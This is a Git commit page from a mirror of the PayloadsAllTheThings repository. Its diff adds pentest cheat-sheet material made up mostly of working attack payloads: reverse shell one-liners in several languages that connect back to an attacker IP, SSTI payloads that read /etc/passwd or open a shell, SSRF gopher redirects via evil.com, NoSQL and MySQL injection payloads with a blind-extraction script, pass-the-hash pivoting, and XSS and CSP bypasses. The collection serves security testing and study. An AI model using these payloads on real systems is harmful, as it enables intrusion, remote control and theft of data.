ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-19 19:06:12 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Traversal Dir + NoSQL major updates + small addons

Browse Source
This commit is contained in:
Swissky 2018-02-15 23:27:42 +01:00
parent 40fa20ec63
commit b87c3fd7ff
9 changed files with 342 additions and 21 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

62
Methodology and Resources/Linux - Reverse Shell Cheatsheet.md
View File

@ -2,15 +2,32 @@
## Reverse Shell Cheat Sheet ## Reverse Shell Cheat Sheet
Bash Bash TCP
```bash ```bash
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
0<&196;exec 196<>/dev/tcp/<your IP>/<same unfiltered port>; sh <&196 >&196 2>&196 0<&196;exec 196<>/dev/tcp/<your IP>/<same unfiltered port>; sh <&196 >&196 2>&196
``` ```
Bash UDP
```
Victim:
sh -i >& /dev/udp/127.0.0.1/4242 0>&1
Listener:
nc -u -lvp 4242
```
Perl Perl
```perl ```perl
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
NOTE: Windows only
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
``` ```
Python Python
@ -26,12 +43,21 @@ php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
Ruby Ruby
```ruby ```ruby
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
NOTE: Windows only
ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
``` ```
Netcat Netcat Traditional
```bash
nc -e /bin/sh [IPADDR] [PORT]
```
Netcat OpenBsd
```bash ```bash
nc -e /bin/sh 10.0.0.1 1234
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
``` ```
@ -41,6 +67,11 @@ ncat 127.0.0.1 4444 -e /bin/bash
ncat --udp 127.0.0.1 4444 -e /bin/bash ncat --udp 127.0.0.1 4444 -e /bin/bash
``` ```
Powershell
```powershell
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("[IPADDR]",[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
```
Java Java
```java ```java
r = Runtime.getRuntime() r = Runtime.getRuntime()
@ -64,7 +95,32 @@ NodeJS
})(); })();
``` ```
## Spawn TTY
```
/bin/sh -i
```
(From an interpreter)
```
python -c 'import pty; pty.spawn("/bin/sh")'
perl -e 'exec "/bin/sh";'
perl: exec "/bin/sh";
ruby: exec "/bin/sh"
lua: os.execute('/bin/sh')
```
(From within vi)
```
:!bash
:set shell=/bin/bash:shell
```
(From within nmap)
```
!sh
```
## Thanks to ## Thanks to
* [Reverse Bash Shell One Liner](https://security.stackexchange.com/questions/166643/reverse-bash-shell-one-liner) * [Reverse Bash Shell One Liner](https://security.stackexchange.com/questions/166643/reverse-bash-shell-one-liner)
* [Pentest Monkey - Cheat Sheet Reverse shell](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) * [Pentest Monkey - Cheat Sheet Reverse shell](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)
* [Spawning a TTY Shell](http://netsec.ws/?p=337)

100
Methodology and Resources/Network Pivoting Techniques.md Normal file
View File

@ -0,0 +1,100 @@
# Network Pivoting Techniques
## SSH
### SOCKS Proxy
```
ssh -D8080 [user]@[host]
ssh -N -f -D 9000 [user]@[host]
-f : ssh in background
-N : do not execute a remote command
```
### Local Port Forwarding
```
ssh -L [bindaddr]:[port]:[dsthost]:[dstport] [user]@[host]
```
### Remote Port Forwarding
```
ssh -R [bindaddr]:[port]:[localhost]:[localport] [user]@[host]
```
## Proxychains
**Config file**: /etc/proxychains.conf
```bash
[ProxyList]
socks4 localhost 8080
```
Set the SOCKS4 proxy then `proxychains nmap 192.168.5.6`
## Web SOCKS - reGeorg
```
python reGeorgSocksProxy.py -p 8080 -u http://compromised.host/shell.jsp
```
## Rpivot
Server (Attacker box)
```python
python server.py --proxy-port 1080 --server-port 9443 --server-ip 0.0.0.0
```
Client (Compromised box)
```python
python client.py --server-ip <ip> --server-port 9443
```
Through corporate proxy
```python
python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] \
--ntlm-proxy-port 8080 --domain CORP --username jdoe --password 1q2w3e
```
Passing the hash
```python
python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] \
--ntlm-proxy-port 8080 --domain CORP --username jdoe \
--hashes 986D46921DDE3E58E03656362614DEFE:50C189A98FF73B39AAD3B435B51404EE
```
## Basic Pivoting Types
| Type | Use Case |
| :------------- | :------------------------------------------ |
| Listen - Listen | Exposed asset, may not want to connect out. |
| Listen - Connect | Normal redirect. |
| Connect - Connect | Cant bind, so connect to bridge two hosts |
## Listen - Listen
| Type | Use Case |
| :------------- | :------------------------------------------ |
| ncat | `ncat -v -l -p 8080 -c "ncat -v -l -p 9090"`|
| socat | `socat -v tcp-listen:8080 tcp-listen:9090` |
| remote host 1 | `ncat localhost 8080 < file` |
| remote host 2 | `ncat localhost 9090 > newfile` |
## Listen - Connect
| Type | Use Case |
| :------------- | :------------------------------------------ |
| ncat | `ncat -l -v -p 8080 -c "ncat localhost 9090"` |
| socat | `socat -v tcp-listen:8080,reuseaddr tcp-connect:localhost:9090` |
| remote host 1 | `ncat localhost -p 8080 < file` |
| remote host 2 | `ncat -l -p 9090 > newfile` |
## Connect - Connect
| Type | Use Case |
| :------------- | :------------------------------------------ |
| ncat | `ncat localhost 8080 -c "ncat localhost 9090"` |
| socat | `socat -v tcp-connect:localhost:8080,reuseaddr tcp-connect:localhost:9090` |
| remote host 1 | `ncat -l -p 8080 < file |
| remote host 2 | `ncat -l -p 9090 > newfile` |
## Thanks to
* [Network Pivoting Techniques - Bit rot](https://bitrot.sh/cheatsheet/14-12-2017-pivoting/)

4
Methodology and Resources/Windows - Using credentials.md
View File

@ -47,6 +47,10 @@ python wmiexec.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5
python rdpcheck.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5 python rdpcheck.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5
rdesktop -d CSCOU -u jarrieta -p nastyCutt3r 10.9.122.5 rdesktop -d CSCOU -u jarrieta -p nastyCutt3r 10.9.122.5
``` ```
Note: you may need to enable it with the following command
```
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0x00000000 /f
```
## Netuse (Windows) ## Netuse (Windows)
``` ```

43
NoSQL injection/README.md
View File

@ -3,9 +3,16 @@ NoSQL databases provide looser consistency restrictions than traditional SQL dat
## Exploit ## Exploit
Basic authentication bypass using not equal ($ne) Basic authentication bypass using not equal ($ne) or greater ($gt)
``` ```
in URL
username[$ne]=toto&password[$ne]=toto username[$ne]=toto&password[$ne]=toto
in JSON
{"username": {"$ne": null}, "password": {"$ne": null} }
{"username": {"$ne": "foo"}, "password": {"$ne": "bar"} }
{"username": {"$gt": undefined}, "password": {"$gt": undefined} }
``` ```
Extract length information Extract length information
@ -16,12 +23,39 @@ username[$ne]=toto&password[$regex]=.{3}
Extract data information Extract data information
``` ```
in URL
username[$ne]=toto&password[$regex]=m.{2} username[$ne]=toto&password[$regex]=m.{2}
username[$ne]=toto&password[$regex]=md.{1} username[$ne]=toto&password[$regex]=md.{1}
username[$ne]=toto&password[$regex]=mdp username[$ne]=toto&password[$regex]=mdp
username[$ne]=toto&password[$regex]=m.* username[$ne]=toto&password[$regex]=m.*
username[$ne]=toto&password[$regex]=md.* username[$ne]=toto&password[$regex]=md.*
in JSON
{"username": {"$eq": "admin"}, "password": {"$regex": "^m" }}
{"username": {"$eq": "admin"}, "password": {"$regex": "^md" }}
{"username": {"$eq": "admin"}, "password": {"$regex": "^mdp" }}
```
## Blind NoSQL
```python
import requests
import urllib3
import string
import urllib
urllib3.disable_warnings()
username="admin"
password=""
while True:
for c in string.printable:
if c not in ['*','+','.','?','|']:
payload='{"username": {"$eq": "%s"}, "password": {"$regex": "^%s" }}' % (username, password + c)
r = requests.post(u, data = {'ids': payload}, verify = False)
if 'OK' in r.text:
print("Found one more char : %s" % (password+c))
password += c
``` ```
## MongoDB Payloads ## MongoDB Payloads
@ -47,6 +81,7 @@ db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emi
## Thanks to ## Thanks to
* https://www.dailysecurity.fr/nosql-injections-classique-blind/ * https://www.dailysecurity.fr/nosql-injections-classique-blind/
* https://www.owasp.org/index.php/Testing_for_NoSQL_injection * https://www.owasp.org/index.php/Testing_for_NoSQL_injection
* https://github.com/cr0hn/nosqlinjection_wordlists * https://github.com/cr0hn/nosqlinjection_wordlists
* https://zanon.io/posts/nosql-injection-in-mongodb

6
SQL injection/MySQL Injection.md
View File

@ -33,6 +33,12 @@ AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),column_name,CHAR(126))
AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)),null)-- AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)),null)--
``` ```
Shorter to read:
```
' and updatexml(null,concat(0x0a,version()),null)-- -
' and updatexml(null,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() LIMIT 0,1)),null)-- -
```
## MYSQL Error Based - Extractvalue function ## MYSQL Error Based - Extractvalue function
``` ```
AND extractvalue(rand(),concat(CHAR(126),version(),CHAR(126)))-- AND extractvalue(rand(),concat(CHAR(126),version(),CHAR(126)))--

39
SSRF injection/README.md
View File

@ -35,6 +35,12 @@ Using this vulnerability users can upload images from any image URL = trigger an
``` ```
## Bypassing filters ## Bypassing filters
Bypass using HTTPS
```
https://127.0.0.1/
https://localhost/
```
Bypass localhost with [::] Bypass localhost with [::]
``` ```
http://[::]:80/ http://[::]:80/
@ -53,6 +59,7 @@ http://0000::1:3128/ Squid
Bypass localhost with a domain redirecting to locahost Bypass localhost with a domain redirecting to locahost
``` ```
http://localtest.me
http://n-pn.info http://n-pn.info
``` ```
@ -144,6 +151,37 @@ You didn't say the magic word !
QUIT QUIT
``` ```
Gopher:// SMTP - Back connect to 1337
```php
Content of evil.com/redirect.php:
<?php
header("Location: gopher://hack3r.site:1337/_SSRF%0ATest!");
?>
Now query it.
https://example.com/?q=http://evil.com/redirect.php.
```
Gopher:// SMTP - send a mail
```php
Content of evil.com/redirect.php:
<?php
$commands = array(
'HELO victim.com',
'MAIL FROM: <admin@victim.com>',
'RCPT To: <sxcurity@oou.us>',
'DATA',
'Subject: @sxcurity!',
'Corben was here, woot woot!',
'.'
);
$payload = implode('%0A', $commands);
header('Location: gopher://0:25/_'.$payload);
?>
```
## SSRF on AWS Bucket ## SSRF on AWS Bucket
Interesting path to look for at http://169.254.169.254 Interesting path to look for at http://169.254.169.254
``` ```
@ -191,3 +229,4 @@ http://0251.00376.000251.0000376/ Dotted octal with padding
* [Les Server Side Request Forgery : Comment contourner un pare-feu - @Geluchat](https://www.dailysecurity.fr/server-side-request-forgery/) * [Les Server Side Request Forgery : Comment contourner un pare-feu - @Geluchat](https://www.dailysecurity.fr/server-side-request-forgery/)
* [AppSecEU15 Server side browsing considered harmful - @Agarri](http://www.agarri.fr/docs/AppSecEU15-Server_side_browsing_considered_harmful.pdf) * [AppSecEU15 Server side browsing considered harmful - @Agarri](http://www.agarri.fr/docs/AppSecEU15-Server_side_browsing_considered_harmful.pdf)
* [Enclosed alphanumerics - @EdOverflow](https://twitter.com/EdOverflow) * [Enclosed alphanumerics - @EdOverflow](https://twitter.com/EdOverflow)
* [Hacking the Hackers: Leveraging an SSRF in HackerTarget - @sxcurity](http://www.sxcurity.pro/2017/12/17/hackertarget/)

45
Server Side Template injections/README.md
View File

@ -2,19 +2,47 @@
Template injection allows an attacker to include template code into an existant (or not) template. Template injection allows an attacker to include template code into an existant (or not) template.
## Ruby
#### Basic injection
```python
<%= 7 * 7 %>
```
#### Retrieve /etc/passwd
```python
<%= File.open('/etc/passwd').read %>
```
## Java
#### Basic injection
```java
${{7*7}}
```
#### Retrieve the systems environment variables.
```java
${T(java.lang.System).getenv()}
```
#### Retrieve /etc/passwd
```java
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
```
## Jinja2 ## Jinja2
[Official website](http://jinja.pocoo.org/) [Official website](http://jinja.pocoo.org/)
> Jinja2 is a full featured template engine for Python. It has full unicode support, an optional integrated sandboxed execution environment, widely used and BSD licensed. > Jinja2 is a full featured template engine for Python. It has full unicode support, an optional integrated sandboxed execution environment, widely used and BSD licensed.
Basic injection #### Basic injection
``` ```python
{{4*4}}[[5*5]] {{4*4}}[[5*5]]
``` ```
Jinja2 is used by Python Web Frameworks such as Django or Flask. Jinja2 is used by Python Web Frameworks such as Django or Flask.
The above injections have been tested on Flask application. The above injections have been tested on Flask application.
#### Template format #### Template format
``` ```python
{% extends "layout.html" %} {% extends "layout.html" %}
{% block body %} {% block body %}
<ul> <ul>
@ -27,7 +55,7 @@ The above injections have been tested on Flask application.
``` ```
#### Dump all used classes #### Dump all used classes
``` ```python
{{ ''.__class__.__mro__[2].__subclasses__() }} {{ ''.__class__.__mro__[2].__subclasses__() }}
``` ```
@ -40,7 +68,7 @@ The above injections have been tested on Flask application.
``` ```
#### Read remote file #### Read remote file
``` ```python
# ''.__class__.__mro__[2].__subclasses__()[40] = File class # ''.__class__.__mro__[2].__subclasses__()[40] = File class
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }} {{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
``` ```
@ -62,8 +90,9 @@ Inject this template
{{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }} # connect to evil host {{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }} # connect to evil host
``` ```
#### Ressources & Sources ## Thanks to
[https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/) * [https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/)
* [Yahoo! RCE via Spring Engine SSTI](https://hawkinsecurity.com/2017/12/13/rce-via-spring-engine-ssti/)
* [Ruby ERB Template injection - TrustedSec](https://www.trustedsec.com/2017/09/rubyerb-template-injection/)
#### Training #### Training
[https://w3challs.com/](https://w3challs.com/) [https://w3challs.com/](https://w3challs.com/)

27
Traversal directory/README.md
View File

@ -2,7 +2,7 @@
A directory traversal consists in exploiting insufficient security validation / sanitization of user-supplied input file names, so that characters representing "traverse to parent directory" are passed through to the file APIs. A directory traversal consists in exploiting insufficient security validation / sanitization of user-supplied input file names, so that characters representing "traverse to parent directory" are passed through to the file APIs.
## Exploit ## Exploit
Basic
``` ```
../ ../
..\ ..\
@ -16,5 +16,28 @@ A directory traversal consists in exploiting insufficient security validation /
...\.\ ...\.\
``` ```
16 bit Unicode encoding
```
. = %u002e
/ = %u2215
\ = %u2216
```
Double URL encoding
```
. = %252e
/ = %252f
\ = %255c
```
UTF-8 Unicode encoding
```
. = %c0%2e, %e0%40%ae, %c0ae
/ = %c0%af, %e0%80%af, %c0%2f
\ = %c0%5c, %c0%80%5c
```
## Thanks to ## Thanks to
* * https://twitter.com/huykha10/status/962419695470174208

35
XSS injection/README.md
View File

@ -100,6 +100,7 @@ io.swf?yid=\"));}catch(e){alert(1);}//
video-js.swf?readyFunction=alert%28document.domain%2b'%20XSSed!'%29 video-js.swf?readyFunction=alert%28document.domain%2b'%20XSSed!'%29
bookContent.swf?currentHTMLURL=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4 bookContent.swf?currentHTMLURL=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4
flashcanvas.swf?id=test\"));}catch(e){alert(document.domain)}// flashcanvas.swf?id=test\"));}catch(e){alert(document.domain)}//
phpmyadmin/js/canvg/flashcanvas.swf?id=test\”));}catch(e){alert(document.domain)}//
``` ```
XSS in Hidden input XSS in Hidden input
@ -113,6 +114,20 @@ DOM XSS
#"><img src=/ onerror=alert(2)> #"><img src=/ onerror=alert(2)>
``` ```
XSS in JS Context (payload without quote/double quote from [@brutelogic](https://twitter.com/brutelogic)
```
-(confirm)(document.domain)//
; alert(1);//
```
XSS URL
```
URL/<svg onload=alert(1)>
URL/<script>alert('XSS');//
URL/<input autofocus onfocus=alert(1)>
```
## XSS in wrappers javascript and data URI ## XSS in wrappers javascript and data URI
XSS with javascript: XSS with javascript:
``` ```
@ -609,6 +624,11 @@ Little Endian : 0xFF 0xFE 0x00 0x00
XSS : %00%00%fe%ff%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E XSS : %00%00%fe%ff%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E
``` ```
Bypass CSP using JSONP from Google (Trick by [@apfeifer27](https://twitter.com/apfeifer27))
//google.com/complete/search?client=chrome&jsonp=alert(1);
```
<script/src=//google.com/complete/search?client=chrome%26jsonp=alert(1);>"
```
Bypass using weird encoding or native interpretation to hide the payload (alert()) Bypass using weird encoding or native interpretation to hide the payload (alert())
```javascript ```javascript
@ -619,9 +639,6 @@ Bypass using weird encoding or native interpretation to hide the payload (alert(
<script>(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()</script> <script>(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]